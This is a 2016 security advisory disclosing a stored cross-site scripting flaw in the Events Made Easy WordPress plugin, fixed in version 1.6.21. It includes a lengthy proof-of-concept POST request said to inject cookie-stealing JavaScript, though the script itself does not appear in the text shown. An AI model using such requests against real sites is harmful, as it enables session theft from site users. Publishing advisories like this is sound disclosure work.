------------------------------------------------------------------------ Cross-Site Scripting vulnerability in Events Made Easy WordPress plugin ------------------------------------------------------------------------ Job Diesveld, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting vulnerability has been found in the Events Made Easy WordPress plugin. By using this issue an attacker can create a specially crafted event which, when posted to WordPress, injects malicious JavaScript code into the application. This code will execute within the browser of any user who views the relevant application content. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160729-0001 ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue has been fixed in Events Made Easy plugin version 1.6.21. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html Proof of Concept The following request can be used to create an event containing JavaScript that will obtain the cookie of the current user: POST /wp-admin/admin.php?page=events-manager&eme_admin_action=update_event&event_id=16 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: Connection: close Content-Type: multipart/form-data; boundary=---------------------------224523339434990794855940370 Content-Length: 8579 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_status" 5 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_contactperson_id" -1 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_seats" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="price" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="currency" EUR -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_max_allowed" 10 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_min_allowed" 1 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_rsvp_discount" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_rsvp_discountgroup" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="rsvp_number_days" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="rsvp_number_hours" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_rsvp_end_target" start -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_name" fooname -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_slug" fooname -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="localised_recurrence_date" 07/29/2016 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="recurrence_start_date" 2016-07-29 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="localised_recurrence_end_date" 07/29/2016 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="recurrence_end_date" 2016-07-29 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="recurrence_freq" daily -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="recurrence_interval" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="recurrence_byweekno" 1 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="recurrence_byday" 1 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="localised_event_start_date" 07/29/2016 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_start_date" 2016-07-29 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="localised_event_end_date" 07/29/2016 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_end_date" 2016-07-29 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_start_time" 01:22PM -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_end_time" 01:22PM -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_page_title_format_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_page_title_format" lalalala -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_single_event_format_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_single_event_format"

#_STARTDATE - #_STARTTIME

#_TOWN

#_NOTES

#_ADDBOOKINGFORM

#_MAP

-----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_contactperson_email_body_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_contactperson_email_body" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_registration_recorded_ok_html_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_registration_recorded_ok_html" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_respondent_email_body_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_respondent_email_body" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_registration_pending_email_body_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_registration_pending_email_body" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_registration_updated_email_body_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_registration_updated_email_body" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_registration_cancelled_email_body_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_registration_cancelled_email_body" Dear #_RESPNAME, Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been cancelled. Yours faithfully,awfe #_CONTACTPERSON -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_registration_denied_email_body_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_registration_denied_email_body" Dear #_RESPNAME, Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been denied. Yours faithfully, #_CONTACTPERSONawef -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_registration_form_format_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_registration_form_format" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="eme_prop_event_cancel_form_format_tpl" 0 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_cancel_form_format" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="location_name" piet -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="location_address" kaas -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="location_town" foo -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="location_latitude" 57.198 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="location_longitude" 9.67063 -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="content" gold -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_image_url" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_image_id" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_url" -----------------------------224523339434990794855940370 Content-Disposition: form-data; name="event_update_button" Update AA>> -----------------------------224523339434990794855940370 ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.